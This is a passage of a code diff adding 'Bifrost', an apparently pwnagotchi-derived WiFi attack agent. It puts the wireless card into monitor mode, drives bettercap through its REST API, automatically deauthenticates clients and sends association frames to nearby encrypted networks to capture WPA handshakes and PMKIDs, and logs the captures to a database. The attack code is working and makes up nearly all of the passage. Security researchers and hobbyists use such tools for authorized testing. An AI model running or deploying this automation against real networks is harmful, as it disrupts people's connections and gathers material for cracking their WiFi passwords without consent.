subprocess.run(
['airmon-ng', 'check', 'kill'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
timeout=15,
)
logger.info("Starting monitor mode: airmon-ng start %s", base_iface)
result = subprocess.run(
['airmon-ng', 'start', base_iface],
capture_output=True, text=True, timeout=30,
)
combined = (result.stdout + result.stderr).strip()
logger.info("airmon-ng output: %s", combined)
if 'Operation not supported' in combined or 'command failed' in combined:
logger.warning("airmon-ng failed: %s", combined)
else:
# airmon-ng may rename the interface (wlan0 -> wlan0mon)
if self._iface_exists(iface):
logger.info("Monitor mode active: %s", iface)
airmon_ok = True
elif self._iface_exists(base_iface):
logger.info("Interface %s is now in monitor mode (no rename)", base_iface)
cfg['bifrost_iface'] = base_iface
self._mon_iface = base_iface
airmon_ok = True
if airmon_ok:
return
except FileNotFoundError:
logger.warning("airmon-ng not found, trying iw fallback ...")
except Exception as e:
logger.warning("airmon-ng failed: %s, trying iw fallback ...", e)
# ── Strategy 3: iw (direct fallback) ──────────────────────
try:
subprocess.run(
['ip', 'link', 'set', base_iface, 'down'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
result = subprocess.run(
['iw', 'dev', base_iface, 'set', 'type', 'monitor'],
capture_output=True, text=True, timeout=10,
)
if result.returncode != 0:
err = result.stderr.strip()
logger.error("iw set monitor failed (rc=%d): %s", result.returncode, err)
self._monitor_failed = True
subprocess.run(
['ip', 'link', 'set', base_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
return
subprocess.run(
['ip', 'link', 'set', base_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
logger.info("Monitor mode set via iw on %s", base_iface)
cfg['bifrost_iface'] = base_iface
self._mon_iface = base_iface
except Exception as e:
logger.error("Failed to set monitor mode: %s", e)
self._monitor_failed = True
def _setup_nexmon(self, base_iface, cfg):
"""Enable monitor mode using nexmon (for Broadcom brcmfmac chips).
Creates a separate monitor interface (mon0) so wlan0 can potentially
remain usable for management traffic (like pwnagotchi does).
Returns True on success, False on failure.
"""
mon_iface = 'mon0'
phy = self._detect_phy(base_iface)
logger.info("Nexmon: setting up monitor mode on %s (phy=%s)", base_iface, phy)
try:
# Kill interfering services (same as pwnagotchi)
for svc in ('wpa_supplicant', 'NetworkManager', 'dhcpcd'):
subprocess.run(
['systemctl', 'stop', svc],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
# Remove old mon0 if it exists
if self._iface_exists(mon_iface):
subprocess.run(
['iw', 'dev', mon_iface, 'del'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
)
# Create monitor interface via iw phy
result = subprocess.run(
['iw', 'phy', phy, 'interface', 'add', mon_iface, 'type', 'monitor'],
capture_output=True, text=True, timeout=10,
)
if result.returncode != 0:
logger.error("Failed to create %s: %s", mon_iface, result.stderr.strip())
return False
# Bring monitor interface up
subprocess.run(
['ifconfig', mon_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
# Enable monitor mode with radiotap headers via nexutil
result = subprocess.run(
['nexutil', '-m2'],
capture_output=True, text=True, timeout=10,
)
if result.returncode != 0:
logger.warning("nexutil -m2 returned rc=%d: %s", result.returncode, result.stderr.strip())
# Verify
verify = subprocess.run(
['nexutil', '-m'],
capture_output=True, text=True, timeout=5,
)
mode_val = verify.stdout.strip()
logger.info("nexutil -m reports: %s", mode_val)
if not self._iface_exists(mon_iface):
logger.error("Monitor interface %s not created", mon_iface)
return False
# Success — update config to use mon0
cfg['bifrost_iface'] = mon_iface
self._mon_iface = mon_iface
self._nexmon_used = True
logger.info("Nexmon monitor mode active on %s (phy=%s)", mon_iface, phy)
return True
except FileNotFoundError as e:
logger.error("Required tool not found: %s", e)
return False
except Exception as e:
logger.error("Nexmon setup error: %s", e)
return False
def _teardown_monitor_mode(self):
"""Restore the WiFi interface to managed mode (idempotent)."""
if self._monitor_torn_down:
return
base_iface = getattr(self, '_base_iface', None)
mon_iface = getattr(self, '_mon_iface', None)
if not base_iface:
return
self._monitor_torn_down = True
logger.info("Restoring managed mode for %s ...", base_iface)
if getattr(self, '_nexmon_used', False):
# ── Nexmon teardown ──
try:
subprocess.run(
['nexutil', '-m0'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
)
logger.info("Nexmon monitor mode disabled (nexutil -m0)")
except Exception:
pass
# Remove the mon0 interface
if mon_iface and mon_iface != base_iface and self._iface_exists(mon_iface):
try:
subprocess.run(
['iw', 'dev', mon_iface, 'del'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=5,
)
logger.info("Removed monitor interface %s", mon_iface)
except Exception:
pass
else:
# ── airmon-ng / iw teardown ──
try:
iface_to_stop = mon_iface or base_iface
subprocess.run(
['airmon-ng', 'stop', iface_to_stop],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
timeout=15,
)
logger.info("Monitor mode stopped via airmon-ng")
except FileNotFoundError:
try:
subprocess.run(
['ip', 'link', 'set', base_iface, 'down'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
subprocess.run(
['iw', 'dev', base_iface, 'set', 'type', 'managed'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
subprocess.run(
['ip', 'link', 'set', base_iface, 'up'],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=10,
)
logger.info("Managed mode restored via iw on %s", base_iface)
except Exception as e:
logger.error("Failed to restore managed mode: %s", e)
except Exception as e:
logger.warning("airmon-ng stop failed: %s", e)
# Restart network services that were killed
restarted = False
for svc in ('wpa_supplicant', 'dhcpcd', 'NetworkManager'):
try:
subprocess.run(
['systemctl', 'start', svc],
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, timeout=15,
)
restarted = True
except Exception:
pass
# Wait for network services to actually reconnect before handing
# control back so the orchestrator doesn't scan a dead interface.
if restarted:
logger.info("Waiting for network services to reconnect ...")
time.sleep(5)
@staticmethod
def _iface_exists(iface_name):
"""Check if a network interface exists."""
return os.path.isdir('/sys/class/net/%s' % iface_name)
# ── Bettercap subprocess management ────────────────
def _start_bettercap(self):
"""Spawn bettercap subprocess with REST API."""
cfg = self.shared_data.config
iface = cfg.get('bifrost_iface', 'wlan0mon')
host = cfg.get('bifrost_bettercap_host', '127.0.0.1')
port = str(cfg.get('bifrost_bettercap_port', 8081))
user = cfg.get('bifrost_bettercap_user', 'user')
password = cfg.get('bifrost_bettercap_pass', 'pass')
cmd = [
'bettercap', '-iface', iface, '-no-colors',
'-eval', 'set api.rest.address %s' % host,
'-eval', 'set api.rest.port %s' % port,
'-eval', 'set api.rest.username %s' % user,
'-eval', 'set api.rest.password %s' % password,
'-eval', 'api.rest on',
]
logger.info("Starting bettercap: %s", ' '.join(cmd))
try:
self._bettercap_proc = subprocess.Popen(
cmd,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
logger.info("bettercap PID: %d", self._bettercap_proc.pid)
except FileNotFoundError:
logger.error("bettercap not found! Install with: apt install bettercap")
raise
except Exception as e:
logger.error("Failed to start bettercap: %s", e)
raise
def _stop_bettercap(self):
"""Kill the bettercap subprocess."""
if self._bettercap_proc:
try:
self._bettercap_proc.terminate()
self._bettercap_proc.wait(timeout=5)
except subprocess.TimeoutExpired:
self._bettercap_proc.kill()
except Exception:
pass
self._bettercap_proc = None
logger.info("bettercap stopped")
# ── Status for web API ────────────────────────────────
def get_status(self):
"""Return full engine status for web API."""
base = {
'enabled': self.enabled,
'running': self._running,
'monitor_failed': self._monitor_failed,
}
if self.agent and self._running:
base.update(self.agent.get_status())
else:
base.update({
'mood': 'sleeping',
'face': '(-.-) zzZ',
'voice': '',
'channel': 0,
'num_aps': 0,
'num_handshakes': 0,
'uptime': 0,
'epoch': 0,
'mode': 'auto',
'last_pwnd': '',
'reward': 0,
})
return base

568
bifrost/agent.py Normal file
View File

@@ -0,0 +1,568 @@
"""
Bifrost — WiFi recon agent.
Ported from pwnagotchi/agent.py using composition instead of inheritance.
"""
import time
import json
import os
import re
import asyncio
import threading
import logging
from bifrost.bettercap import BettercapClient
from bifrost.automata import BifrostAutomata
from bifrost.epoch import BifrostEpoch
from bifrost.voice import BifrostVoice
from bifrost import plugins
from logger import Logger
logger = Logger(name="bifrost.agent", level=logging.DEBUG)
class BifrostAgent:
"""WiFi recon agent — drives bettercap, captures handshakes, tracks epochs."""
def __init__(self, shared_data, stop_event=None):
self.shared_data = shared_data
self._config = shared_data.config
self.db = shared_data.db
self._stop_event = stop_event or threading.Event()
# Sub-systems
cfg = self._config
self.bettercap = BettercapClient(
hostname=cfg.get('bifrost_bettercap_host', '127.0.0.1'),
scheme='http',
port=int(cfg.get('bifrost_bettercap_port', 8081)),
username=cfg.get('bifrost_bettercap_user', 'user'),
password=cfg.get('bifrost_bettercap_pass', 'pass'),
)
self.automata = BifrostAutomata(cfg)
self.epoch = BifrostEpoch(cfg)
self.voice = BifrostVoice()
self._started_at = time.time()
self._filter = None
flt = cfg.get('bifrost_filter', '')
if flt:
try:
self._filter = re.compile(flt)
except re.error:
logger.warning("Invalid bifrost_filter regex: %s", flt)
self._current_channel = 0
self._tot_aps = 0
self._aps_on_channel = 0
self._supported_channels = list(range(1, 15))
self._access_points = []
self._last_pwnd = None
self._history = {}
self._handshakes = {}
self.mode = 'auto'
# Whitelist
self._whitelist = [
w.strip().lower() for w in
str(cfg.get('bifrost_whitelist', '')).split(',') if w.strip()
]
# Channels
self._channels = [
int(c.strip()) for c in
str(cfg.get('bifrost_channels', '')).split(',') if c.strip()
]
# Ensure handshakes dir
hs_dir = cfg.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes')
if hs_dir and not os.path.exists(hs_dir):
try:
os.makedirs(hs_dir, exist_ok=True)
except OSError:
pass
# ── Lifecycle ─────────────────────────────────────────
def start(self):
"""Initialize bettercap, start monitor mode, begin event polling."""
self._wait_bettercap()
self.setup_events()
self.automata.set_starting()
self._log_activity('system', 'Bifrost starting', self.voice.on_starting())
self.start_monitor_mode()
self.start_event_polling()
self.start_session_fetcher()
self.next_epoch()
self.automata.set_ready()
self._log_activity('system', 'Bifrost ready', self.voice.on_ready())
def setup_events(self):
"""Silence noisy bettercap events."""
logger.info("connecting to %s ...", self.bettercap.url)
silence = [
'ble.device.new', 'ble.device.lost', 'ble.device.disconnected',
'ble.device.connected', 'ble.device.service.discovered',
'ble.device.characteristic.discovered',
'mod.started', 'mod.stopped', 'update.available',
'session.closing', 'session.started',
]
for tag in silence:
try:
self.bettercap.run('events.ignore %s' % tag, verbose_errors=False)
except Exception:
pass
def _reset_wifi_settings(self):
iface = self._config.get('bifrost_iface', 'wlan0mon')
self.bettercap.run('set wifi.interface %s' % iface)
self.bettercap.run('set wifi.ap.ttl %d' % self._config.get('bifrost_personality_ap_ttl', 120))
self.bettercap.run('set wifi.sta.ttl %d' % self._config.get('bifrost_personality_sta_ttl', 300))
self.bettercap.run('set wifi.rssi.min %d' % self._config.get('bifrost_personality_min_rssi', -200))
hs_dir = self._config.get('bifrost_bettercap_handshakes', '/root/bifrost/handshakes')
self.bettercap.run('set wifi.handshakes.file %s' % hs_dir)
self.bettercap.run('set wifi.handshakes.aggregate false')
def start_monitor_mode(self):
"""Wait for monitor interface and start wifi.recon."""
iface = self._config.get('bifrost_iface', 'wlan0mon')
has_mon = False
retries = 0
while not has_mon and retries < 30 and not self._stop_event.is_set():
try:
s = self.bettercap.session()
for i in s.get('interfaces', []):
if i['name'] == iface:
logger.info("found monitor interface: %s", i['name'])
has_mon = True
break
except Exception:
pass
if not has_mon:
logger.info("waiting for monitor interface %s ... (%d)", iface, retries)
self._stop_event.wait(2)
retries += 1
if not has_mon:
logger.warning("monitor interface %s not found after %d retries", iface, retries)
# Detect supported channels
try:
from bifrost.compat import _build_utils_shim
self._supported_channels = _build_utils_shim(self.shared_data).iface_channels(iface)
except Exception:
self._supported_channels = list(range(1, 15))
logger.info("supported channels: %s", self._supported_channels)
self._reset_wifi_settings()
# Start wifi recon
try:
wifi_running = self._is_module_running('wifi')
if wifi_running:
self.bettercap.run('wifi.recon off; wifi.recon on')
self.bettercap.run('wifi.clear')
else:
self.bettercap.run('wifi.recon on')
except Exception as e:
err_msg = str(e)
if 'Operation not supported' in err_msg or 'EOPNOTSUPP' in err_msg:
logger.error(
"wifi.recon failed: %s — Your WiFi chip likely does NOT support "
"monitor mode. The built-in Broadcom chip on Raspberry Pi Zero/Zero 2 "
"has limited monitor mode support. Use an external USB WiFi adapter "
"(e.g. Alfa AWUS036ACH, Panda PAU09) that supports monitor mode and "
"packet injection.", e)
self._log_activity('error',
'WiFi chip does not support monitor mode',
'Use an external USB WiFi adapter with monitor mode support')
else:
logger.error("Error starting wifi.recon: %s", e)
def _wait_bettercap(self):
retries = 0
while retries < 30 and not self._stop_event.is_set():
try:
self.bettercap.session()
return
except Exception:
logger.info("waiting for bettercap API ...")
self._stop_event.wait(2)
retries += 1
if not self._stop_event.is_set():
raise Exception("bettercap API not available after 60s")
def _is_module_running(self, module):
try:
s = self.bettercap.session()
for m in s.get('modules', []):
if m['name'] == module:
return m['running']
except Exception:
pass
return False
# ── Recon cycle ───────────────────────────────────────
def recon(self):
"""Full-spectrum WiFi scan for recon_time seconds."""
recon_time = self._config.get('bifrost_personality_recon_time', 30)
max_inactive = 3
recon_mul = 2
if self.epoch.inactive_for >= max_inactive:
recon_time *= recon_mul
self._current_channel = 0
if not self._channels:
logger.debug("RECON %ds (all channels)", recon_time)
try:
self.bettercap.run('wifi.recon.channel clear')
except Exception:
pass
else:
ch_str = ','.join(map(str, self._channels))
logger.debug("RECON %ds on channels %s", recon_time, ch_str)
try:
self.bettercap.run('wifi.recon.channel %s' % ch_str)
except Exception as e:
logger.error("Error setting recon channels: %s", e)
self.automata.wait_for(recon_time, self.epoch, sleeping=False,
stop_event=self._stop_event)
def _filter_included(self, ap):
if self._filter is None:
return True
return (self._filter.match(ap.get('hostname', '')) is not None or
self._filter.match(ap.get('mac', '')) is not None)
def get_access_points(self):
"""Fetch APs from bettercap, filter whitelist and open networks."""
aps = []
try:
s = self.bettercap.session()
plugins.on("unfiltered_ap_list", s.get('wifi', {}).get('aps', []))
for ap in s.get('wifi', {}).get('aps', []):
enc = ap.get('encryption', '')
if enc == '' or enc == 'OPEN':
continue
hostname = ap.get('hostname', '').lower()
mac = ap.get('mac', '').lower()
prefix = mac[:8]
if (hostname not in self._whitelist and
mac not in self._whitelist and
prefix not in self._whitelist):
if self._filter_included(ap):
aps.append(ap)
except Exception as e:
logger.error("Error getting APs: %s", e)
aps.sort(key=lambda a: a.get('channel', 0))
self._access_points = aps
plugins.on('wifi_update', aps)
self.epoch.observe(aps, list(self.automata.peers.values()))
# Update DB with discovered networks
self._persist_networks(aps)
return aps
def get_access_points_by_channel(self):
"""Get APs grouped by channel, sorted by density."""
aps = self.get_access_points()
grouped = {}
for ap in aps:
ch = ap.get('channel', 0)
if self._channels and ch not in self._channels:
continue
grouped.setdefault(ch, []).append(ap)
return sorted(grouped.items(), key=lambda kv: len(kv[1]), reverse=True)
# ── Actions ───────────────────────────────────────────
def _should_interact(self, who):
if self._has_handshake(who):
return False
if who not in self._history:
self._history[who] = 1
return True
self._history[who] += 1
max_int = self._config.get('bifrost_personality_max_interactions', 3)
return self._history[who] < max_int
def _has_handshake(self, bssid):
for key in self._handshakes:
if bssid.lower() in key:
return True
return False
def associate(self, ap, throttle=0):
"""Send association frame to trigger PMKID."""
if self.automata.is_stale(self.epoch):
return
if (self._config.get('bifrost_personality_associate', True) and
self._should_interact(ap.get('mac', ''))):
try:
hostname = ap.get('hostname', ap.get('mac', '?'))
logger.info("ASSOC %s (%s) ch=%d rssi=%d",
hostname, ap.get('mac', ''), ap.get('channel', 0), ap.get('rssi', 0))
self.bettercap.run('wifi.assoc %s' % ap['mac'])
self.epoch.track(assoc=True)
self._log_activity('assoc', 'Association: %s' % hostname,
self.voice.on_assoc(hostname))
except Exception as e:
self.automata.on_error(ap.get('mac', ''), e)
plugins.on('association', ap)
if throttle > 0:
time.sleep(throttle)
def deauth(self, ap, sta, throttle=0):
"""Deauthenticate client to capture handshake."""
if self.automata.is_stale(self.epoch):
return
if (self._config.get('bifrost_personality_deauth', True) and
self._should_interact(sta.get('mac', ''))):
try:
logger.info("DEAUTH %s (%s) from %s ch=%d",
sta.get('mac', ''), sta.get('vendor', ''),
ap.get('hostname', ap.get('mac', '')), ap.get('channel', 0))
self.bettercap.run('wifi.deauth %s' % sta['mac'])
self.epoch.track(deauth=True)
self._log_activity('deauth', 'Deauth: %s' % sta.get('mac', ''),
self.voice.on_deauth(sta.get('mac', '')))
except Exception as e:
self.automata.on_error(sta.get('mac', ''), e)
plugins.on('deauthentication', ap, sta)
if throttle > 0:
time.sleep(throttle)
def set_channel(self, channel, verbose=True):
"""Hop to a specific WiFi channel."""
if self.automata.is_stale(self.epoch):
return
wait = 0
if self.epoch.did_deauth:
wait = self._config.get('bifrost_personality_hop_recon_time', 10)
elif self.epoch.did_associate:
wait = self._config.get('bifrost_personality_min_recon_time', 5)
if channel != self._current_channel:
if self._current_channel != 0 and wait > 0:
logger.debug("waiting %ds on channel %d", wait, self._current_channel)
self.automata.wait_for(wait, self.epoch, stop_event=self._stop_event)
try:
self.bettercap.run('wifi.recon.channel %d' % channel)
self._current_channel = channel
self.epoch.track(hop=True)
plugins.on('channel_hop', channel)
except Exception as e:
logger.error("Error setting channel: %s", e)
def next_epoch(self):
"""Transition to next epoch — evaluate mood."""
self.automata.next_epoch(self.epoch)
# Persist epoch to DB
data = self.epoch.data()
self._persist_epoch(data)
self._log_activity('epoch', 'Epoch %d' % (self.epoch.epoch - 1),
self.voice.on_epoch(self.epoch.epoch - 1))
# ── Event polling ─────────────────────────────────────
def start_event_polling(self):
"""Start event listener in background thread.
Tries websocket first; falls back to REST polling if the
``websockets`` package is not installed.
"""
t = threading.Thread(target=self._event_poller, daemon=True, name="BifrostEvents")
t.start()
def _event_poller(self):
try:
self.bettercap.run('events.clear')
except Exception:
pass
# Probe once whether websockets is available
try:
import websockets # noqa: F401
has_ws = True
except ImportError:
has_ws = False
logger.warning("websockets package not installed — using REST event polling "
"(pip install websockets for real-time events)")
if has_ws:
self._ws_event_loop()
else:
self._rest_event_loop()
def _ws_event_loop(self):
"""Websocket-based event listener (preferred)."""
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
while not self._stop_event.is_set():
try:
loop.run_until_complete(self.bettercap.start_websocket(
self._on_event, self._stop_event))
except Exception as ex:
if self._stop_event.is_set():
break
logger.debug("Event poller error: %s", ex)
self._stop_event.wait(5)
loop.close()
def _rest_event_loop(self):
"""REST-based fallback event poller — polls /api/events every 2s."""
while not self._stop_event.is_set():
try:
events = self.bettercap.events()
for ev in (events or []):
tag = ev.get('tag', '')
if tag == 'wifi.client.handshake':
# Build a fake websocket message for the existing handler
import asyncio as _aio
_loop = _aio.new_event_loop()
_loop.run_until_complete(self._on_event(json.dumps(ev)))
_loop.close()
except Exception as ex:
logger.debug("REST event poll error: %s", ex)
self._stop_event.wait(2)
async def _on_event(self, msg):
"""Handle bettercap websocket events."""
try:
jmsg = json.loads(msg)
except json.JSONDecodeError:
return
if jmsg.get('tag') == 'wifi.client.handshake':
filename = jmsg.get('data', {}).get('file', '')
sta_mac = jmsg.get('data', {}).get('station', '')
ap_mac = jmsg.get('data', {}).get('ap', '')
key = "%s -> %s" % (sta_mac, ap_mac)
if key not in self._handshakes:
self._handshakes[key] = jmsg
self._last_pwnd = ap_mac
# Find AP info
ap_name = ap_mac
try:
s = self.bettercap.session()
for ap in s.get('wifi', {}).get('aps', []):
if ap.get('mac') == ap_mac:
if ap.get('hostname') and ap['hostname'] != '<hidden>':
ap_name = ap['hostname']
break
except Exception:
pass
logger.warning("!!! HANDSHAKE: %s -> %s !!!", sta_mac, ap_name)
self.epoch.track(handshake=True)
self._persist_handshake(ap_mac, sta_mac, ap_name, filename)
self._log_activity('handshake',
'Handshake: %s' % ap_name,
self.voice.on_handshakes(1))
plugins.on('handshake', filename, ap_mac, sta_mac)
def start_session_fetcher(self):
"""Start background thread that polls bettercap for stats."""
t = threading.Thread(target=self._fetch_stats, daemon=True, name="BifrostStats")
t.start()
def _fetch_stats(self):
while not self._stop_event.is_set():
try:
s = self.bettercap.session()
self._tot_aps = len(s.get('wifi', {}).get('aps', []))
except Exception:
pass
self._stop_event.wait(2)
# ── Status for web API ────────────────────────────────
def get_status(self):
"""Return current agent state for the web API."""
return {
'mood': self.automata.mood,
'face': self.automata.face,
'voice': self.automata.voice_text,
'channel': self._current_channel,
'num_aps': self._tot_aps,
'num_handshakes': len(self._handshakes),
'uptime': int(time.time() - self._started_at),
'epoch': self.epoch.epoch,
'mode': self.mode,
'last_pwnd': self._last_pwnd or '',
'reward': self.epoch.data().get('reward', 0),
}
# ── DB persistence ────────────────────────────────────
def _persist_networks(self, aps):
"""Upsert discovered networks to DB."""
for ap in aps:
try:
self.db.execute(
"""INSERT INTO bifrost_networks
(bssid, essid, channel, encryption, rssi, vendor, num_clients, last_seen)
VALUES (?, ?, ?, ?, ?, ?, ?, CURRENT_TIMESTAMP)
ON CONFLICT(bssid) DO UPDATE SET
essid=?, channel=?, encryption=?, rssi=?, vendor=?,
num_clients=?, last_seen=CURRENT_TIMESTAMP""",
(ap.get('mac', ''), ap.get('hostname', ''), ap.get('channel', 0),
ap.get('encryption', ''), ap.get('rssi', 0), ap.get('vendor', ''),
len(ap.get('clients', [])),
ap.get('hostname', ''), ap.get('channel', 0),
ap.get('encryption', ''), ap.get('rssi', 0), ap.get('vendor', ''),
len(ap.get('clients', [])))
)
except Exception as e:
logger.debug("Error persisting network: %s", e)
def _persist_handshake(self, ap_mac, sta_mac, ap_name, filename):
try:
self.db.execute(
"""INSERT OR IGNORE INTO bifrost_handshakes
(ap_mac, sta_mac, ap_essid, filename)
VALUES (?, ?, ?, ?)""",
(ap_mac, sta_mac, ap_name, filename)
)
except Exception as e:
logger.debug("Error persisting handshake: %s", e)
def _persist_epoch(self, data):
try:
self.db.execute(
"""INSERT INTO bifrost_epochs
(epoch_num, started_at, duration_secs, num_deauths, num_assocs,
num_handshakes, num_hops, num_missed, num_peers, mood, reward,
cpu_load, mem_usage, temperature, meta_json)
VALUES (?, datetime('now'), ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)""",
(self.epoch.epoch - 1, data.get('duration_secs', 0),
data.get('num_deauths', 0), data.get('num_associations', 0),
data.get('num_handshakes', 0), data.get('num_hops', 0),
data.get('missed_interactions', 0), data.get('num_peers', 0),
self.automata.mood, data.get('reward', 0),
data.get('cpu_load', 0), data.get('mem_usage', 0),
data.get('temperature', 0), '{}')
)
except Exception as e:
logger.debug("Error persisting epoch: %s", e)
def _log_activity(self, event_type, title, details=''):
"""Log an activity event to the DB."""
self.automata.voice_text = details or title
try:
self.db.execute(
"""INSERT INTO bifrost_activity (event_type, title, details)
VALUES (?, ?, ?)""",
(event_type, title, details)
)
except Exception as e:
logger.debug("Error logging activity: %s", e)

168
bifrost/automata.py Normal file
View File

@@ -0,0 +1,168 @@
"""
Bifrost — Mood state machine.
Ported from pwnagotchi/automata.py.
"""
import logging
from bifrost import plugins as plugins
from bifrost.faces import MOOD_FACES
from logger import Logger
logger = Logger(name="bifrost.automata", level=logging.DEBUG)
class BifrostAutomata:
"""Evaluates epoch data and transitions between moods."""
def __init__(self, config):
self._config = config
self.mood = 'starting'
self.face = MOOD_FACES.get('starting', '(. .)')
self.voice_text = ''
self._peers = {} # peer_id -> peer_data
@property
def peers(self):
return self._peers
def _set_mood(self, mood):
self.mood = mood
self.face = MOOD_FACES.get(mood, '(. .)')
def set_starting(self):
self._set_mood('starting')
def set_ready(self):
self._set_mood('ready')
plugins.on('ready')
def _has_support_network_for(self, factor):
bond_factor = self._config.get('bifrost_personality_bond_factor', 20000)
total_encounters = sum(
p.get('encounters', 0) if isinstance(p, dict) else getattr(p, 'encounters', 0)
for p in self._peers.values()
)
support_factor = total_encounters / bond_factor
return support_factor >= factor
def in_good_mood(self):
return self._has_support_network_for(1.0)
def set_grateful(self):
self._set_mood('grateful')
plugins.on('grateful')
def set_lonely(self):
if not self._has_support_network_for(1.0):
logger.info("unit is lonely")
self._set_mood('lonely')
plugins.on('lonely')
else:
logger.info("unit is grateful instead of lonely")
self.set_grateful()
def set_bored(self, inactive_for):
bored_epochs = self._config.get('bifrost_personality_bored_epochs', 15)
factor = inactive_for / bored_epochs if bored_epochs else 1
if not self._has_support_network_for(factor):
logger.warning("%d epochs with no activity -> bored", inactive_for)
self._set_mood('bored')
plugins.on('bored')
else:
logger.info("unit is grateful instead of bored")
self.set_grateful()
def set_sad(self, inactive_for):
sad_epochs = self._config.get('bifrost_personality_sad_epochs', 25)
factor = inactive_for / sad_epochs if sad_epochs else 1
if not self._has_support_network_for(factor):
logger.warning("%d epochs with no activity -> sad", inactive_for)
self._set_mood('sad')
plugins.on('sad')
else:
logger.info("unit is grateful instead of sad")
self.set_grateful()
def set_angry(self, factor):
if not self._has_support_network_for(factor):
logger.warning("too many misses -> angry (factor=%.1f)", factor)
self._set_mood('angry')
plugins.on('angry')
else:
logger.info("unit is grateful instead of angry")
self.set_grateful()
def set_excited(self):
logger.warning("lots of activity -> excited")
self._set_mood('excited')
plugins.on('excited')
def set_rebooting(self):
self._set_mood('broken')
plugins.on('rebooting')
def next_epoch(self, epoch):
"""Evaluate epoch state and transition mood.
Args:
epoch: BifrostEpoch instance
"""
was_stale = epoch.num_missed > self._config.get('bifrost_personality_max_misses', 8)
did_miss = epoch.num_missed
# Trigger epoch transition (resets counters, computes reward)
epoch.next()
max_misses = self._config.get('bifrost_personality_max_misses', 8)
excited_threshold = self._config.get('bifrost_personality_excited_epochs', 10)
# Mood evaluation (same logic as pwnagotchi automata.py)
if was_stale:
factor = did_miss / max_misses if max_misses else 1
if factor >= 2.0:
self.set_angry(factor)
else:
logger.warning("agent missed %d interactions -> lonely", did_miss)
self.set_lonely()
elif epoch.sad_for:
sad_epochs = self._config.get('bifrost_personality_sad_epochs', 25)
factor = epoch.inactive_for / sad_epochs if sad_epochs else 1
if factor >= 2.0:
self.set_angry(factor)
else:
self.set_sad(epoch.inactive_for)
elif epoch.bored_for:
self.set_bored(epoch.inactive_for)
elif epoch.active_for >= excited_threshold:
self.set_excited()
elif epoch.active_for >= 5 and self._has_support_network_for(5.0):
self.set_grateful()
plugins.on('epoch', epoch.epoch - 1, epoch.data())
def on_miss(self, who):
logger.info("it looks like %s is not in range anymore :/", who)
def on_error(self, who, e):
if 'is an unknown BSSID' in str(e):
self.on_miss(who)
else:
logger.error(str(e))
def is_stale(self, epoch):
return epoch.num_missed > self._config.get('bifrost_personality_max_misses', 8)
def wait_for(self, t, epoch, sleeping=True, stop_event=None):
"""Wait and track sleep time.
If *stop_event* is provided the wait is interruptible so the
engine can shut down quickly even during long recon windows.
"""
plugins.on('sleep' if sleeping else 'wait', t)
epoch.track(sleep=True, inc=t)
import time
if stop_event is not None:
stop_event.wait(t)
else:
time.sleep(t)

103
bifrost/bettercap.py Normal file
View File

@@ -0,0 +1,103 @@
"""
Bifrost — Bettercap REST API client.
Ported from pwnagotchi/bettercap.py using urllib (no requests dependency).
"""
import json
import logging
import base64
import urllib.request
import urllib.error
from logger import Logger
logger = Logger(name="bifrost.bettercap", level=logging.DEBUG)
class BettercapClient:
"""Synchronous REST client for the bettercap API."""
def __init__(self, hostname='127.0.0.1', scheme='http', port=8081,
username='user', password='pass'):
self.hostname = hostname
self.scheme = scheme
self.port = port
self.username = username
self.password = password
self.url = "%s://%s:%d/api" % (scheme, hostname, port)
self.websocket = "ws://%s:%s@%s:%d/api" % (username, password, hostname, port)
self._auth_header = 'Basic ' + base64.b64encode(
('%s:%s' % (username, password)).encode()
).decode()
def _request(self, method, path, data=None, verbose_errors=True):
"""Make an HTTP request to bettercap API."""
url = "%s%s" % (self.url, path)
body = json.dumps(data).encode() if data else None
req = urllib.request.Request(url, data=body, method=method)
req.add_header('Authorization', self._auth_header)
if body:
req.add_header('Content-Type', 'application/json')
try:
with urllib.request.urlopen(req, timeout=10) as resp:
raw = resp.read().decode('utf-8')
try:
return json.loads(raw)
except json.JSONDecodeError:
return raw
except urllib.error.HTTPError as e:
err = "error %d: %s" % (e.code, e.read().decode('utf-8', errors='replace').strip())
if verbose_errors:
logger.info(err)
raise Exception(err)
except urllib.error.URLError as e:
raise Exception("bettercap unreachable: %s" % e.reason)
def session(self):
"""GET /api/session — current bettercap state."""
return self._request('GET', '/session')
def run(self, command, verbose_errors=True):
"""POST /api/session — execute a bettercap command."""
return self._request('POST', '/session', {'cmd': command},
verbose_errors=verbose_errors)
def events(self):
"""GET /api/events — poll recent events (REST fallback)."""
try:
result = self._request('GET', '/events', verbose_errors=False)
# Clear after reading so we don't reprocess
try:
self.run('events.clear', verbose_errors=False)
except Exception:
pass
return result if isinstance(result, list) else []
except Exception:
return []
async def start_websocket(self, consumer, stop_event=None):
"""Connect to bettercap websocket event stream.
Args:
consumer: async callable that receives each message string.
stop_event: optional threading.Event — exit when set.
"""
import websockets
import asyncio
ws_url = "%s/events" % self.websocket
while not (stop_event and stop_event.is_set()):
try:
async with websockets.connect(ws_url, ping_interval=60,
ping_timeout=90) as ws:
async for msg in ws:
if stop_event and stop_event.is_set():
return
try:
await consumer(msg)
except Exception as ex:
logger.debug("Error parsing event: %s", ex)
except Exception as ex:
if stop_event and stop_event.is_set():
return
logger.debug("Websocket error: %s — reconnecting...", ex)
